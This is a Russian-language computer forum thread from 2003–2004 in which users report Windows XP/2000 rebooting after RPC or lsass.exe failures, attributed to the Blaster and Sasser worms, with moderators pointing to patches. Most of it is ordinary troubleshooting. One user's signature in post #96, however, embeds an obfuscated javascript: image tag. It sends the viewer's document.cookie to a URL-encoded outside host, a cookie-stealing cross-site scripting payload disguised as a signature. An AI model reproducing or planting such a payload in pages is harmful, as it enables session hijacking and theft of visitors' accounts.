Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Клиентские ОС Microsoft » Microsoft Windows 2000/XP » Службы - [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe

Ответить
Настройки темы
Службы - [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe
AnimaD

Профиль | Цитировать

Изменения
Автор: Blast
Дата: 15-01-2006
Ошибка:
Система завершает работу. Сохраните
данные и выйдите из системы. Все
несохраненные изменения будут
потеряны. Отключение системы вызвано
NT AUTHORITY\SYSTEM

Время до отключения 00:01:00

поскольку произошла непредвиденная
остановка службы Удаленный вызов
процедур (RPC)

Что делать?

Решение проблемы изложено вот здесь!

Помогите, пожалуйста!
вчера вечером вдруг снова появилась эта чума.
Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК.
внешнее проявление точно как BLAST, только теперь ссылается
на WINDOWS\System\lsass.exe

Компьютер заражен червем Worm.Win32.Sasser
Это сообщение посчитали полезным следующие участники:

Отправлено: 08:28, 12-08-2003

Новый участник

Благодарности: 0

Профиль | Отправить PM | Цитировать

Так... ну и чо... у всех чума уже закончилась месяц назад, да?...
А у меня вот только началась....

В системных файлах, процессах и автозагрузке проверял всё, ничё подозрительного.
У мня 2к(рус) и ХР(РЕ,sp1+заплатки). Глючат обе. Перезагружается сразу, никакой те минуты для прощанья.
Ща поставил в 3-ий раздел ещё ХР, качаю новые заплаты. даже если поможет, как те два вина к жизни вернуть? они ни в одном из режимов не грузятся (точнее, сразу перезагружаются)!!! Если ток из консоли восстановления мон вход выполнить... но эт на вряд поможет. Откат непомогает=(((

Заранее спасибо.

Отправлено: 22:55, 06-06-2004 | #91

Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.

nikolaik

Профиль | Цитировать

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

Добавлено:

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

Отправлено: 12:44, 07-06-2004 | #92

Новый участник

У мня касперский. Обновляется нормально, ток без толку, ни хрена не находит. Качай обновления, должно помочь. Я вот пока сижу... ток Update Rollup 1 не помог, после него ещё кучу заплаток скачал, не знаю, работаю вот пока, но в 2К свой заходить боюсь. Если опять всё накроется буду держать в курсе....

Ниужели новая чума?!?!?!?

Добавлено:

Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!

Отправлено: 12:56, 07-06-2004 | #93

(*.*)

Благодарности: 6697

Профиль | Сайт | Отправить PM | Цитировать

cBonD
nikolaik
Эта тема возникла потому, что бластер вызывал проблему с перезагрузкой системы, и все шли в ХР с вопросами. Решение проблемы обозначено в самом первом сообщении темы.

Для обсуждение вирусов и методов их удаления есть форум Информационная Безопасность.  

Цитата:
Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления.
http://forum.oszone.net/topic.cgi?fo...amp;topic=5060

-------
Канал Windows 11, etc | Чат @winsiders

Отправлено: 20:05, 07-06-2004 | #94

Новый участник

Дык не похоже всё это дело на бластер! Говорю хе, сразу вырубается и всё!!! Если в Debug Mode грузиться, то иногда возникает ошибка "Mashine_check_exeption". А воще я вот ща себе ещё раз c: форматнул и вин переставил, ща XP(PE) без SP1, вроде не глючит пока... мож просто в обновлении у мня какая дрянь сидела?... (у мня dial-up, соответственно, ставлю с харда, качать не имеет смысла... )

Отправлено: 00:03, 08-06-2004 | #95

AStranger

Профиль | Цитировать

Цитата:
Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!
Да, кстати у меня та же самая фигня
------------------
[img]javAScript :i = new Image();i.src='%68%74%74%70%3A%2F%2F%67%36%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%61%2E%6A%70%67?'+docu ment.cookie[/img]

Отправлено: 00:28, 08-06-2004 | #96

Новый участник

Newbie, а у тебя SP1?

Отправлено: 00:32, 08-06-2004 | #97

(*.*)

Цитата:
Дык не похоже всё это дело на бластер!
Тогда почему это обсуждается в данной теме? Включайте фаервол, ставтьте все заплатки и не будет проблем. А вот как удалить вирус в Инф. Без., плиз. Спасибо.

-------

Отправлено: 00:36, 08-06-2004 | #98

Линуксоид-стакановец

Благодарности: 186

При подключении к нету вылетает LSA Shell. Вызывает ошибку и вываливает службу NT Authority, далее, я думаю, все знают. Что делать?

[s]Исправлено: [mzd], 15:55 29-06-2004[/s]

-------
Живя в реальном мире, стремись к невероятному... Эрнесто Че Гевара
Everybody lies. (c) House M.D.
Базовая настройка Ubuntu. Документация для новичка.
Руководство по установке, начальной настройке и основам использования операционной системы Ubuntu

Отправлено: 14:19, 29-06-2004 | #99

(*.*)

[mzd]
А ты самый первый вопрос в теме читал?

-------

Отправлено: 21:41, 29-06-2004 | #100

Компьютерный форум OSzone.net » Клиентские ОС Microsoft » Microsoft Windows 2000/XP » Службы - [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено